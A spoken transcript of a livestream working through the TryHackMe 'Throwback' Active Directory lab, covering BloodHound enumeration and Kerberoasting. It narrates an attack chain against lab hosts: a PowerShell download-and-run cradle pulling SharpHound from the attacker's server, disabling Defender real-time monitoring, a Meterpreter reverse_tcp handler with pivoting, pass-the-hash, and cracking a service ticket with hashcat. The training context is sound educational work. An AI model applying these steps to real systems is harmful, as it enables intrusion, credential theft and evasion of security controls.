Trying to do some more Twitch things, so I've got the little green screen going on, and I've got the chat over there above me. This is really disorienting. It's good to see everybody. Thanks for coming to hang out. We will do a little bit more TryHackMe Throwback. I'm going to catch up as to where we were last night, but to get the chat looking at least relatively decent, I wanted to make the screen actually visible. If you happen to be looking at a white screen, I don't want that to be shown and be kind of tough to read the chat, so I figured I'll just put it on the black background and I'll just be hanging out over here in the corner. But then it kind of defeats the purpose of me making this green screen. So there is a green screen behind me, and you can see, like, wow, I'm in a dark corner video editing. That's not video editing, but I could show you the green screen behind me if you wanted to see it, like, wow, he's really doing it. He's really saying those words, and those really make sense. Let me show you this. I'll turn off the chroma key for just a quick second. Boom, boom, the illusion's over. Apparently it's just going to ruin my video, though. Incredible. That's the kind of thing where, wow, you could just restart. Oh no, you can restart OBS and then it would look decent, but now it's just horrendous. What the heck, why did I even try to show you this? Why did I even bother? Wow, truly a professional. And you can see, so it's the Dell XPS 15 cam.
That's goofing off down there. All right, we're going to take some drastic measures and we'll just nerf this webcam. Yo, we'll cut this part out. We'll cut this part out of the video. We'll edit this in post. Wow, thanks everybody. This is really what you came to see, I know. So we're doing Throwback. All right, everything's better now. We've got one more Monster to continue the streak, and I guess we'll do it. I don't remember really where I left off, not going to lie. I'm going to have to do a little bit of catching up myself just to remind me where we are. I think we were about to do some BloodHound, which is super duper cool. I don't think I've done BloodHound since the SANS Holiday Hack Challenge. I don't remember what year it was that we had that. Hey, Alpha, what's going on? Holy green screen and chat. Look, I'm a real Twitch streamer. I'm a real boy now. I'm cool. So I should probably first of all connect to the network. I don't really worry; it's just going to crap out again. That's good. TryHackMe, let's get to that Throwback and let's whack that VPN open. My phone's going off already. Are you guys texting me while I'm trying to stream? Yeah, hopefully Terminator actually lives to tell the tale today. Network is running, dope. Can I ping Production? Please don't be five hours today. What? Well, how many hours do you want? Okay, we can ping Production, so that's a plus. What else do we got? Where did we end up? I'm trying to remember where I actually left off. We got some Mimikatz logs where we found the NTLM hash for that PetersJ user, and HumphreyW from his old NTLM hash. At least six hours. Yeah, yeah. We'll see how we do. This is kind of the benefit of having this nightly solitude for the weekend. So we were on the box. What do we need to do with BloodHound?
Now that you have a stable foothold on the Throwback workstation 1... Your team has informed you that it may be... I want to make this text bigger so you guys can see it, but I guess this is the best we're going to do. Maybe that's to enumerate what's on the workstation from the shells you've gotten from phishing and pfSense logs, as well as a new shell from passing the hash. Okay, so we did RDP into something. I have Remmina open for that. Was it Production that we already RDP'd into? You guys have got to remind me. You mean you don't have to? I probably should have taken notes, but PetersJ and the password, I think, was 317 or 319. Oh boy, I don't remember. Okay, it was 317. Incredible, and that works. Let's make this a big screen. We also knew that we had saved credentials. We also had Starkiller up and running with Empire, and we ran some commands. We ran some modules so that we would be able to get logs and Mimikatz stuff, etc., etc. You set up Kali on WSL last night with Win-KeX? It's pretty interesting. What, are you saying Win-KeX intentionally or no? I don't know. How do you guys like this chat over there? I feel like it's taking up a lot of space. I'm going to have to... I feel like maybe it's just not showcasing your messages long enough. Should I have the always-on chat? KeX is a desktop environment for Windows?
I'll look that up. Admin PetersJ, and well, it was the profile, right, and then we would just run cmd.exe. There we go. Now I am admin on PetersJ, so this is at least an administrative account, which helps, and I needed to do some BloodHound stuff. So let's do that. BloodHound is a graphical interface that allows you to visually map out the network using database visualization from Neo4j. BloodHound, along with SharpHound or any BloodHound ingestor, takes the users, groups, trusts and more of a domain and collects them into .json files, and creates a graphical database in Neo4j to view information about the network. We'll be focusing on how to collect the .json files and import them into BloodHound, and on making basic and custom queries in Neo4j. So we need to go ahead and install it. I am on Ubuntu and I am not on Kali, so is that actually going to be in my repositories? Part of me doesn't think that it will be, I'll be honest. Nope. Okay. How do I install BloodHound? Bloodhound. Don't give me an actual dog. Thank you. Okay, fantastic. BloodHound AD, Active Directory. That's good stuff. That's really what we're looking for. Oh, we just have binaries. Fantastic. We should be smart about this one and actually just download the binaries rather than trying to compile things like what we were doing with CME, the CrackMapExec, the other day. That was rough. I appreciate you guys that stuck with me for that, but let's go ahead and save this, download it, and let's make a directory in my /opt folder for BloodHound. So let's move that downloaded BloodHound zip file and let's go ahead and unzip that. Since I'm working on a new resolution for that other screen, man, it really is hard to understand what's happening. That's one big /opt folder. Yeah, I got a lot going on in there, I will admit. Let me turn on that always-on chat, because it looks like that whole right-hand side of the stream just kind of looks cheesy and stupid with nothing there.
So maybe I can make your messages actually hang, make them stay. Give me just a moment. Please. Please. You like the chroma key? Yeah, so I'm trying to do those more Twitch things. Put some epic memes there. Oh, dude, you guys have no idea. It will absolutely do that. Save settings. Now your messages will forever be visible. Hopefully don't say anything bad or inappropriate, pretty please. Yeah, actually, I don't know. You know, oh gosh, asking our palms, fantastic. Yeah, we're doing real Twitch stream things. I'm a real Twitch boy now. I'm not. I'm not at all. I'm not, literally. Okay, BloodHound is doing its thing. BloodHound is happening, BloodHound is running, and then the Neo4j console should just do that. Neo4j and neo4j, those are the only credentials. Yeah. Sorry, frantic alt-tab. Neo4j. Save that password; it's super secure. Oh, we don't have a database running. Oh, I guess I probably need to do that Neo4j thing. Do I have that? Should I actually have a database? I'm confused. I'm immediately confused. To get started with BloodHound, check out the documentation. That's what I'm going to do. Graph theory. Okay, I guess we need databases, right? Neo4j is separate; if you want to install it, I need to install it. Thank you, Jaxmas. Oh man, I'm so glad you're here. Thank you. Where's Krillix? Neo4j, that's got to be in my repositories, I would think. I would think that one would be at least on Ubuntu. Anything Neo4j? Clients. Do I need the server? I feel like I need the server. Well, which of these? Let me go to install. Okay, they should showcase it here. They add it into that. Let's do it. I don't think I need to get the latest Java version, but whenever I make those assumptions, things go wrong, so let's find out. We'll charge right on ahead. Add this to you. Oh gosh, I have to sudo this. Can I do a little tee? sudo, or sudo tee this thing. So now it should be in there. cat that. Good, he's in there. apt-transport-https, I'll do that. That should already be installed.
It sounds like it, and then is Neo4j now going to be in my repositories? No. Oh, Pluggy 11 trying to use some bot commands. I don't know how to do those things yet. Yeah, Neo4j is not... apt update. Oh, you're right. That should have happened and I didn't do it. Thank you, thank you, thank you, chat. Ominous external human being chat. How have you guys been doing today? How's your Sunday been? Is it Sunday where everyone else is? Yeah. All right, cool. Now we got Neo4j. All we had to do was run the sudo apt update command, obviously. You guys just woke up. Oh man, and it's Monday. You guys are... time zones are weird. So when I stayed up late yesterday, we stayed up until maybe four in the morning. I think we stopped streaming at three and then I chilled, played some Super Smash Brothers just to goof off, and then I went to bed and I woke up at two in the afternoon. This is not normal. This is honestly not my sleep schedule whatsoever. Now, why did I stop this? Do they run it again? Sure, I'll stop it. How many Monsters do you have for later? This is the first one. This is how I'm going to prove to you guys, like, oh yeah, we're in this for the long haul once again. Is it going to be in /usr/bin? Is that where it actually put it? which neo4j. It did it. Okay, great, and then I'll just run it in console. Will that work? What failed? The server database was successfully initialized but failed to start. Oh, I probably need to sudo this thing. Yeah, yeah, yeah, I see you, I see you, I see you guys in the chat. Tell me. Run everything as root. Yo, I'm really sorry about that microphone issue earlier. All right, he's doing his thing. Is that the right port? That's good. Just sudo as you. Yeah, everything's perfectly fine. Good, none of these text messages are important. Let me turn off my phone chat. We're keeping it real. What mic do I use? This is an Audio-Technica AT2020. People tell me that it sounds good.
So that's why I use it. You might need to visit the website, though, to set up your password, and that's the thing that it says it's listening on, right? Yeah, yeah, yeah, listening. Turn up. Oh, I got you. So BloodHound suggested bolt. Is that what it should be? What is the difference between bolt and neo4j? Yep, bolt. Okay, Jaxmas was telling me bolt, so bolt it is. Username and password, and let's just do the default things that this recommends. It's listening on localhost, so I'm okay with it. Can I just do that? Can't use an old password. Did it just not do it? I'm confused. Let's try BloodHound; we'll see it now. Credentials need to be changed. I just did that, or at least I tried to, and then it yelled at me and the page just stopped. We're doing it again. Neo4j, learning. Let's use a super good password. Great, now we're doing it. Okay, so BloodHound will just be able to do a thing at that point. Let's connect to it with BloodHound. Success, incredible. And he's just walking along. Oh, beautiful, incredible. All right, now we're going to do some SharpHound stuff. SharpHound was actually in the binaries that we had downloaded yesterday, I thought, right? That was in /opt and it was the GhostPack compiled binaries. Yeah, we have... we don't have SharpHound. We have sharp other things. Okay, let's go get SharpHound. BloodHound ingestors: SharpHound.exe and SharpHound.ps1. The exe is probably what we need. So I would move all of the following to their own terminal window. I would like to let them do their own thing. Just let them live. Oh, gotcha. Okay, yeah, I mean that's a good point, and that way if the thing just crashes and dies, then I won't be hating myself. Let me make a directory for SharpHound, and then I will totally leave this one alone.
I'll leave this Terminator session alone. Just so I know, I will set the profile to something useless, and I know that this is not the terminal that I actually want to be interacting with anymore. Great, now I have a new and better terminal. Oh, thanks, Wester. I appreciate you hanging out. What's going on, ethical kid? Welcome, everybody. I really appreciate you coming to hang out. Okay, we have SharpHound. Oh, they did the ps1 file. Can I do the ps1? Let's... should we try the executable? We already downloaded the executable. So let's get back to where we were in TryHackMe, and hosts in Production, and let's copy that /opt directory's SharpHound, SharpHound, and bring it over here. So now we've got that, and then let's do some python -m http.server. Actually, yeah, let's go for the executable. Give me my IP address, dope, and then let's start up a little server. We don't need to specify a port; it'll do its thing. Okay, so, excuse me, now we can go download this thing. I'm going to hop into PowerShell and then go to PetersJ's directory. Gosh, I hate that I can't actually clear the screen in this. That's okay. I guess we'll just be looking at it real low on the bottom. So let's go ahead and download this. We can use wget, because that's a fine alias for Invoke-WebRequest. Let's http://my IP address on port 8000, and it's SharpHound that we need; it's a capital. Let's use the capital H. Did it do it? No. It's not... wait, what? Wait, what? The executable probably is getting nerfed by Windows Defender, maybe. Yeah, yeah, everyone's saying go for the ps1 file, and that way we can just invoke it right away, if I can get back to my screen here. So the ps1 file: is this going to execute the thing right away, or do I need to specify it? I'm trying to find Invoke-BloodHound, and it just does it. -CollectionMethod All, is that how they invoke it? I think that looks like, yeah, okay, cool. That's exactly how they invoke it. Sweet.
Oh, and they use a Bypass version, interesting. Let's see if this will actually stay on the box and not be ripped. Krillix, good to see you, buddy. Can you hang out with us? Hi, hi, hi. Let's download SharpHound.ps1. Let's... shoot, I probably should have done a pushd and popd to get back to the previous directory. Start up that HTTP server again; it should be http.server. And now let's download that once again, but we'll grab the ps1 file and let's see if that actually gets to keep its contents. No, excuse me, I'm wrong. What? What? Where did I put that thing? Oh, oh, I didn't move it from /opt yet. ps1, do it. There we go, and now we can download that. Hallelujah, look at that, actual content. Incredible. So I'm in PowerShell right now and they used a Bypass profile. Oh yeah, you're right. I probably won't be able to just straight up run it, will I? Let's find out and test. Okay, I guess it just did it. I didn't need to specify the execution policy, apparently. What is the execution policy? I can just look: Get-ExecutionPolicy. I'm already running it with Bypass, apparently, somehow. Okay, I'm good with that. You know what, we're fine. So they just ran it, and that would bring all the functions into scope, and then we saw in the source code when we were looking at it that they offered the example syntax. So the collection method that we can pass, I guess, is All, the domain for Throwback, and then we'll specify a zip file, loot, okay, and then we can pull it back down when they use SCP to get it back to us. What is this supposed to be doing? I'm confused what that command is. scp loot. So you're bringing loot over to Workstation 1 and just putting it in there? I guess so. I guess so. Yeah, I know, I understand it's just transferring the file, but I thought you would want that loot information over on your attacker machine. Oh, Krillix is telling me that might actually be wrong. Okay, let's do it. Let's just run the command then. I'm running this on Production.
Should I be running it on WS01? I think that answers my question. I probably should be in WS01, shouldn't I? Oh, well, we have credentials for WS01. Do I need to be running as an administrator on that? Because I think all we have is BlairJ or Humphrey; that previous section was telling me when we did some pass the hash and we did CME. Any domain user is fine. Okay, great. I'm running it as a local user. Oh, you're right, sorry. I was doing it as the admin PetersJ user currently inside this command prompt. I am running as PetersJ, which is just a local admin, as far as I understand. There's a way I can find that out. Yeah, let's do it from this PowerShell. Let me check the execution policy as I do that. Still Bypass, great. Let's run him and try that one more time. No. What? Check if you're in a domain context. Is this wrong because I'm running it on Production, on prod? Should I be in WS01, because chronologically that's where we previously left off? So what was BlairJ's hash? Got evil-winrm over there, to 10.224.222, user BlairJ, and her hash we can track down. Oh, we actually have her legitimate password. Oh, okay, good. I'm glad Krillix is just as surprised as I am. evil-winrm, you got anything for me? You got any news? Did I specify a port or something with that lowercase -p? Should that be wrong? No, it's password. We'll use the NT hash. We'll use her hash then. Whack, I'm bad at this. The server has rejected the client credentials. What? Try this in PowerShell: $credential = New-Object System.Management.Automation.PSCredential. Get credentials, to get creds. Can you try the creds on the IP address that ends with 219? Yes, let me try to do that. evil-winrm over to Production, so that is just going to be running. Did I break the domain controller? No, I didn't even touch the domain controller.
Oh, okay, so evil-winrm with pass the hash will work for BlairJ on 219, but it didn't seem to work on 222, on WS01. That is what I was looking at, right? And Libbycool is suggesting that I go ahead and take a look at credentials here, where I try and specify them. Was 222 blocking connections? I'm just confused why that isn't happening. Oh, you're right. I'm sorry. Oh my gosh, I'm sorry. I need a proxy. Change that. I'm pretty sure I need to set up all the proxychains stuff again, or I could just use this SSH tunnel thing. You're right, we forgot about proxychains. Gosh darn it. We should use actual proxychains and not just the SSH tunnel. So let's... we have a Meterpreter in here, don't we? Or I thought we did. We have something; we have msfconsole. Let's think and start that up at the very least. Oh, I think I already downloaded that on that box. Yeah, over on this machine I do have, in Windows temp, unless it's died, unless... yeah, met is still there. So we still have our Meterpreter from the other night. With that said, we can use multi/handler over here, excuse me, and set the payload to windows/meterpreter/reverse_tcp. And that I managed to get the SSH tunnel to work, that's like, yes. Yeah, we did. Yeah, I thought we did. Were you there? LHOST tun0 for my IP address, lots of typos, and 4141 is what we ran with. Yeah, no worries, I totally understand. And that's getting us into prod or WS01, which is good. We could also background this and run met here. No, I have to dot-slash it. Do I need to run that one more time? Okay, now 219 is a thing. Now we're on 219 in session two. So, great. Sorry, rookie, I appreciate you coming to hang out. I appreciate you coming to explore with us. I'm still learning this whole thing. set ExitOnSession false. Oh, I follow for that. I apparently just sent money to Nintendo so that I could continue my Nintendo Online subscription.
Thank you, PayPal, for giving me the notification. Yes, use autoroute, autoroute. I need to know. Fantastic, I think I just need to set the session, right? set session 2, and set subnet 10.224.0/24. Do it. Okay, great. Now let's use that SOCKS proxy. Now I have to search for this every single time. search socks4a. Why can't it just use that? I can't know that that's what I'm referring to. Why don't I run ls? So is that show options, and then it's good? Do the thing. Okay, with that, now I should be able to proxychains over to 222 with her password. Will that one work? Will that just do it, or do I need the hash? This is apparently taking a little bit of time. Regardless, we do have access to 222, to WS01, because of Meterpreter, so we had that original callback with the phishing email back when we were looking at SquirrelMail. Proxychains is just not letting that happen. Maybe that box can't do that for some reason. Trying to get on WS01. It's not doing much for me. Okay, is this shell still alive? Oh, you're right, you're right, you're right. Yeah, WinRM might not be on it, but probably SSH is, if it's a Windows 10 machine. I don't know if it's going to be open, but I guess it's worth a try. So ssh BlairJ@222. Yeah, my network is probably just kind of crapping out and we should give it some time. I'm totally cool with that. Let me do that after we see if we can get into this with a password. No. Do I need to specify a domain for using that login? That would be weird to me. I don't think I've ever seen that with SSH. Do what? Is that a thing? I feel like that's not a thing. Oh, oh, I just put Blair. Thank you, gosh. You guys are the best. Can I log in? Amazing. Okay, okay, we're all good. Let's try and see if this can get SharpHound to work, because this is just a regular domain user. Let's do it. If I run PowerShell, will it behave?
Yeah, okay. So let's wget http://my IP address, which is 10.55-something, 10.50.22.5. I will someday remember that. Proxychains sometimes doesn't like WinRM. That's good to know, now that I know that. SharpHound.ps1, and let's see if this will behave. Gotcha. I am just going to be lazy and totally steal the suggested one on the website: Invoke-BloodHound -CollectionMethod All, specifying the domain, and then crank that out. Nope, that's RDP. I don't want to be in the RDP. I want to be in my SSH session. Whack. Oh, got to stinking run that. What is my execution policy? Unrestricted. I do what I want. You suck, you're right. Do I need the exe now? Is that what I should have done earlier? Let's grab that exe and see if it actually loads. Nope, won't do that either. Okay, so let's just run it through memory, right? We can try that. If I do a little New-Object Net.WebClient, I can DownloadString http://10.50.22.5:8000 and run it. Still doesn't like it. What could I just turn off? It's antivirus, right? It's Windows Defender that's telling me I can't run this thing. Realistically, I think we should be doing this on prod, and Krillix kind of mentioned we should probably bounce the network, maybe. ls -la. Yeah, it has zero bytes, because I think Defender's just going to remove it. You could just disable Defender. I'm just a poor, poor domain user. Can I actually do that? Are you joshing with me right now? Is that a thing? PowerShell, disable Windows Defender. I'm a local admin. I'm not a local admin. Am I a local admin? I don't think I'm a local admin. I'm a local... am I literally, am I actually? What? Set-MpPreference. So Libbycool, I don't... I'm sorry, I'm going to butcher your name, is passing along this little command that might very well turn off real-time monitoring: -DisableRealtimeMonitoring. Robin, hello, what's going on? Do it. He did it, I think. Can I Get-MpPreference, and is that going to be an actual thing? Real-time monitoring disabled: DisableRealtimeMonitoring is now True.
Okay, okay. Can I replace that SharpHound executable now? Will that just work? No. Nope, I still have zero bytes here. Lmao. Maybe I can run SharpHound.ps1. I can run SharpHound.ps1. That was awesome. Super cool. Okay, now we could try to actually run Invoke-BloodHound, and it's doing it, I think. I hope. It sounds like things are happening, bro. The green on the Monster is being demolished by the green screen. That's so funny. SharpHound enumeration completed. Okay, so now I have a loot.zip and this incredible .bin file. That's great. What else we got? I guess I can just kind of pull this down now, can I? So I could proxychains scp, right? proxychains scp BlairJ@10.224.222, on Users\BlairJ, this thing, and just bring it here, and now we need her password. Do it, do it, do it. Yes. Okay, awesome. Okay, we got the loot. We have successfully done our enumeration that BloodHound needs, and now that BloodHound is running, we could upload this zip file and do it. So BloodHound, I need to hit this import graph, is that right? Uh, CTF. Yeah, I could just drag and drop the file. You're totally right. I put it in prod, didn't I? Yeah. Bad JSON file. Let's drag and drop the file. Maybe it'll just kind of know what to do with it. Go. What Ubuntu version is John using? I'm using Ubuntu 20.04 currently. Finished processing all of the files. Great. Now what? To view the graph network, open the menu, then Queries. This will give you a list of pre-compiled queries to search from. Queries: find me the shortest path to domain admin. Oh boy, oh boy. So I don't fully understand what I'm looking at yet. Default Domain Policy has a GPLink, and this user, because that's a SID, isn't it? LabMaster contains Spooks, and Spooks is a member of the Domain Admins group. Any of these realistically are MercerH. What is this guy? Oh, Administrator and THROWBACK.local. That makes sense. This user, or this SID, am I saying that right?
I should ignore the LabMaster. What is the LabMaster? Is it just a thing? BloodHound has many queries to utilize, such as looking for domain admins. Yeah, tell me who is cool. MercerH, TaskMGR, Spooks, Administrator, and that's it. So I need MercerH, Spooks or TaskMGR, it sounds like. TaskMGR, I don't know. Am I not seeing things that I should see, because this screenshot is not the same? But I guess it's a completely different domain. I'm using Ubuntu 20.04, in my case. What service account is Kerberoastable? BloodHound can figure that out. List all Kerberoastable accounts. That sounds good to me. SQL-Service, and the Kerberoast ticket is the SQL service. I can zoom in and out on that. That's very fun. Okay, yeah, what domain does the trust connect to? Map domain trusts. Corporate, CORPORATE.local, and I've seen that in the actual network diagram that you see at the very top of this lab here. What normal user account is a domain admin? Spooks. How can I tell what's a normal account? MercerH. Yeah, okay. I see Krillix says that's a screenshot of a different lab, just to give examples. Good enough, good enough. Oh, that guy has a flag. MercerH has a flag. I don't know how I missed that. Noted that real quick. Derivative local admin rights. Let me see if I can just slap this flag in here somewhere. What is the account description flag? I should have figured out that user flag on here. I am actually still on that, aren't I? I'm still on WS, so the Desktop directory. No, she's root. Yeah, she's 9c5. I have that, don't I? Do I not have this? What? I probably wrote it down elsewhere. I think this is number nine. Is that right? Yeah. What is the root flag on Throwback?
WS-01. Sorry, I realize that I'm kind of falling down different rabbit holes right now, but I just wanted to make sure that I get those. I realize I'm being distracted from my original BloodHound task. Let's go get the user flag. So I am going to Get-ChildItem -Recurse where the name is equal to user.txt, and that is in HumphreyW. What bot commands should I have for Twitch, guys? Because I see you guys throwing these exclamation points and I'm not Twitch-smart. This is the second stream that I've done on Twitch, so we keep it real. Nightbot is typically the thing. Okay, I'll do some of that. Get back to BloodHound. Where are we at? What is this description that I need to be caring about? I think I mentioned I thought I saw it say description. What is the account description flag on DC01? So that's got to be it, number 15. Yeah, okay, snag that. You guys look like you're having fun, though. I appreciate you guys working in the chat. I'm glad we got it going in the video. We're trying to amp up some of those Twitch achievements so that we could, I don't know, get that affiliate status, you know. What is this B8 one? Oh, I just randomly copied that. That's fine. Great. We were still doing BloodHound. Let's get back to BloodHound. We needed to know what normal user account is a domain admin. Is that MercerH? Yep, it is MercerH. My phone is going off. Chill, stream time. Some people watching the other video: John isn't an elite haxor, he doesn't use tmux and Kali. That's true. I've never considered myself an elite haxor. I literally say that I'm a script kiddie. Upon looking through BloodHound queries, your team believes that they might have found a SQL service account that you can Kerberoast and possibly use to gain access to SQL databases in the future. I shouldn't immediately just turn myself off from BloodHound. I do want to look at other things that this can do. What is that, DCSync rights? What are DCSync rights?
These roles have replication permissions that include the following rights that enable a DCSync attack: Replicating Directory Changes, Replicating Directory Changes All. So that's a known attack, a DCSync attack: impersonate a domain controller. Ah, yeah, I guess I can understand why that might be a bad thing. How the DCSync attack works, hmm. You have... oh, sorry, Krillix. Oh, I'm reading on ahead more than I should be. You sync two different domain controllers, so if you have full access to one, you can have access to the other. That's cool. Yeah, sweet. Let me put it away if the class is going to teach me, if I'm going to get schooled on my own. Then: upon looking through BloodHound queries, your team believes they found a SQL service you can Kerberoast. Yeah, oh, I'm so excited. We'll get to do some Kerberoasting. I haven't done this before. It's one of those things you hear all the time, but I'm just not that cool. Kerberoasting allows you to request a service ticket for any service with a registered SPN and then use that ticket to crack the service password. Hmm, if the service has a registered SPN. What is an SPN? Did we define SPN and I just didn't know it? SPN, SPN, SPN. We did this earlier. Oh no, no, this is no... service principal name. Service principal name, thank you, chat. A service principal name is the unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name. Okay, okay, so this... is it fair to say, if I read this, that a Kerberoasting attack does boil down to password security? I'll press the I-believe button on the SPN, the service principal name. If a service has that, it's using a service password, but the complexity of this attack, barring that, is just based off the password. Is that right? Am I understanding that right?
To enumerate Kerberoastable accounts, you can use BloodHound to find all of the Kerberoastable accounts. Oh, sweet. Yeah, the Attacking Kerberos room goes way in depth in this. Cool, hopefully we can tackle that after this thing. To enumerate Kerberoastable accounts, use BloodHound to find all the Kerberoastable accounts. Great, and that will allow you to see what kind of accounts you can Kerberoast. That's an incredible sentence. If they're domain admins, what kind of connections they have to the rest of the domain. Okay, if you want to look for what you're looking for, look for what you're looking for and you'll find what you're looking for. I'm not hating. I just think that's fantastic. Impacket releases have been unstable. Oh, I think I heard, yeah, I heard The Cyber Mentor saying this same sort of thing in one of his streams. 0.9.20 was getting wonky. What version of Impacket do I have? Impacket in Impacket. Yeah, that thing. Nope, from the command? Okay. Impacket, how do I know what version I have? Is there a regular command? I guess I could just check the README or the changelog. Yeah, you guys are right, version. Version, version, version. That's it. Great. How about that changelog? 0.9.15. Am I using way old? Oh, I guess I could use pip, but I'm sorry, pip3. No, that's the pip version. You're trolling me. That's fine. I'm assuming under the changelog that it was this, 15. So I don't think I am in the wrong right now. So, gotcha. Kerberoasting with Impacket: we have a GetUserSPNs, and we want to proxychains that. How did we get to 117? Where did we randomly choose that IP address? Is that just the SQL server? Can I use RustScan with proxychains? proxychains rustscan 10.200.24.117. Probably not. Let's do a little Nmap. Oh god, proxychains is going to be like, here's everything. Oh yeah, that has 3389.
So I will trust that that is the SQL server. Team view select rough... We had a list of hosts that we gathered earlier, and 117 was in that list, and that was 3389. We could scan some of those if we wanted to. It's actually the domain controller, excuse me. This proxychains output is tough to listen... work through. It has port 80 open. It has SSH, 139, 445. So, okay. Oh, you're right. I'm sorry. Yeah, I misspoke. I said RDP. I said 3389 is RDP. I meant 3306, or 3036... what the hell am I saying? MySQL port, 3306. Yeah, thank god I don't look like all that much of an idiot. So, okay, we found... like, make believe we found the domain controller. We know its IP address as 117. Would I be using this GetUserSPNs on strictly that? Or is that going to be... I guess so. I mean, you're just passing it as the DC IP. Do you always run that GetUserSPNs on the domain controller? Or can you do it on, like, another machine that is running a service? Like, if I had found the actual SQL server, could I specify that for GetUserSPNs? Okay, and any valid set of credentials? That's crazy. So I could use Blair's. Try with some frets... Okay, I will believe that that is the domain controller. I'm fine with that, and I'll use GetUserSPNs, python3, and we need to specify the DC IP address, 224 117, and you specify domain and a user. What is this -request? throwback.local/BlairJ. Let's use hers just for the sake of learnings. And slap that bad boy in, and -request. Does he do it? Request... request a service ticket. Oh, I need to stick in proxychains, I think. I'm pretty sure. Oh, shoot. Yeah, is that version off? Oh, no. I mean, it gave me a ticket. So... gave me one from SQL service. Cryillic, I'm happy to hear that. I'm glad that this is actually kind of helpful for you guys. I was thinking about going through it because, like, well, I'm going through and reading everything. It's easy for me to be like, "that's spelled wrong, that grammar, does it make any sense?"
And it's just easy to be, like, a poopy Debbie Downer, Negative Nancy, Poopy Patricia. But I thought, like, let's make it... let's make a pull request for Throwback, like, "fix everyone's typos," and, like, no, that's a horrible, horrible idea. Um, okay, now we have a thing. We have this ticket, right? That's the best way to refer to it. What is this? What is the best way to refer to what I actually just received? Is this... am I understanding that this is a ticket? No, I totally get you. I'm playing with Cryillic. Obviously, trying to write 37 tasks is no easy thing, and I mean, you've done an incredible job going through all of this. So thank you for putting up with me badgering you with questions. No, dude, I'm teasing you. You're good. All right, we've got a hash anyway, so let's keep track of this. What I'm struggling to know is what to call this, though. This is credentials for the SQL service. SQL service hash, Kerberos hash, just slap it in. "You said write instead of right and it makes me mad." Yeah. Granting ticket hash, is that right? Is that what I got, cake fuming? This is SQL service. Yeah, yep, yep. This is definitely a SQL service thing. So let's get my Colabcat going again. Here we go. Can I go back to the Colabcat that I was in? Oh god, I'm super zoomed in. I don't want this. Oh no, oh no, oh no. I'm just gonna make sure that I've got this Colabcat stuff set up again. I think I can revisit the same thing that I already had opened, I think. Let's find out. Cryillic, congratulations. Oh, yeah, I need to do the authorization things again. Let me do that real quick. Sorry. Allow, allow. I am very happy to learn about Colabcat, though. That was kind of... this has been very, very much kind of cool. This is new for me. That failed to do it.
So, once again, the authorization code didn't get it right. The same thing was, like, giving me trouble in the last stream, yesterday. I'm gonna see if I can do this again. Do you think normal hashcat will be able to crack this fast enough in my case? Or am I gonna, like, ruin the stream again, as usual? What the f... There's a thing. Yeah, I don't want to do that locally at the moment. So I go to this thing, and I get the code, and I paste it in, and it tells me it's wrong. Why? I don't know what the OPSEC concern is in this case. Yeah, I'm seriously... I'm doing this over and over again. Fifth time's the charm. It's frustrating. If only we had gotten to this part last night, when Colabcat worked properly. Oh my gosh, it actually did it. You know what I think happens? I think, when you click on... Google has that little copy-to-clipboard icon for you. I feel like that copy is, like, the wrong thing, or it doesn't do it, or it doesn't actually copy it into your clipboard. So when I, like, highlighted the text, it would work just fine. Just that, like, when I did that locally, it behaved. So now we'll let hashcat do his thing. Nightwolf, what's up? How do you think... what do you think? I feel like the green screen thing is kind of weird, but it's good to have the chat. I wanted to have the green screen over my video where it usually is, so it looks, like, a little bit... I don't know, cool, fancy. But then, me trying to put the chat in there, if it were the text over a white screen, it would be really hard to read and it would just kind of suck. So I figured, like, let's go for a lower-resolution video and have that off to the side, so you can see the chat and me chatting. It kind of, like, takes away the beauty of the green screen, though, if I have a black background all around me.
That's not as fun. So, we got to get past two hours to be able to reach that eight-hour achievement for streaming and getting into, like, the Twitch affiliate thing or whatever. So we did six hours and 11 minutes yesterday, and because we went over... we crossed the timeline of one day into midnight, it counted as two days. So we already have the okay stream for, like, however many days in the 30-day period. So yeah, we're gonna be pretty easy, easy breezy, beautiful CoverGirl on all those other Twitch achievements. So I'm grateful for... appreciate the support, trying to make some of those Twitch things come through. People told me, like, it'd be really cool to hang out on Twitch, because I feel like a lot of times when I do YouTube videos, it's a very, very prepackaged... like, obviously I've done the room before, I've done the machine, or, like, I've already kind of figured out what to do, and you can, like... it's an act, right? It's a show. Yeah, so when I get to stream with you guys, it's me being a little bit of a goofball and me totally failing repeatedly and letting Terminator crash and recovering from things going wrong. So, just a different feeling, a little different vibe. Yeah, that's exactly... there's no fourth wall here. That's a good point. That's a good way to say it. And when I uploaded the previous part of this onto YouTube, I think that was kind of well received, but I did that strategically to, like, slightly pull some of the YouTube audience into this. Okay, uh, don't actually run that, actually. Yeah, thanks. Let me just actually now get a regular bash command prompt here. "You sneaky John." I am root. I have hashcat. I still can't see what I type. Incredible. So I want to get into my drive and .hashcat. If I type that right... no. Where did it put all this? It did it. Oh, it's in drive/MyDrive/.hashcat. Oh, I know that I fat-fingered that. I can just absolutely tell. I hate that.
I can't see. I still didn't do the reverse shell. This is not entertainment. Can I do the reverse shell, honestly? I'd have to, like, get into my BYOB server or, like, run ngrok, and that wouldn't be that much fun. I could ngrok, but I've actually never done ngrok before. That would be weird too. Or I could just hop over to my server. Mmm, let's not, though. Let's not do a reverse shell on Google stuff. cd drive/MyDrive. We did it. All right, now we got all this stuff. So let's echo literally all this into ticket.txt. Can I cat out ticket.txt, and it has all the output? It does. Ooh, it tried to use some bash variable expansion in there because I didn't use single quotes. I can see that right away and already know that's wrong. Now let's check out ticket. There we go. Okay, now we've got the full string in there. Um, what is this suggesting that I do? What hash is it going to end up using? What hash type? hashcat types: Kerberos, Kerberos, Kerberos. What does mine look like? krb5tgs and 23. Let me search for that. 13100, is that what they suggest? Yeah, it is. Amazing. Okay, and we do still have rockyou in here. So we can hashcat -m 13100 ticket.txt with rockyou.txt, and he's cruising, I think, doing his thing. Gotcha. Now if I scroll all the way over, we have a cracked password of mysql337570. Nice. Oh, yeah, "don't know how you're doing the commands blind. I would just copy and paste them." Yeah, I don't know. It's trusting that I can type okay. Cracked password for SQL service account. I had a question mark because I'm not 100% positive. What account was compromised by Kerberoasting?
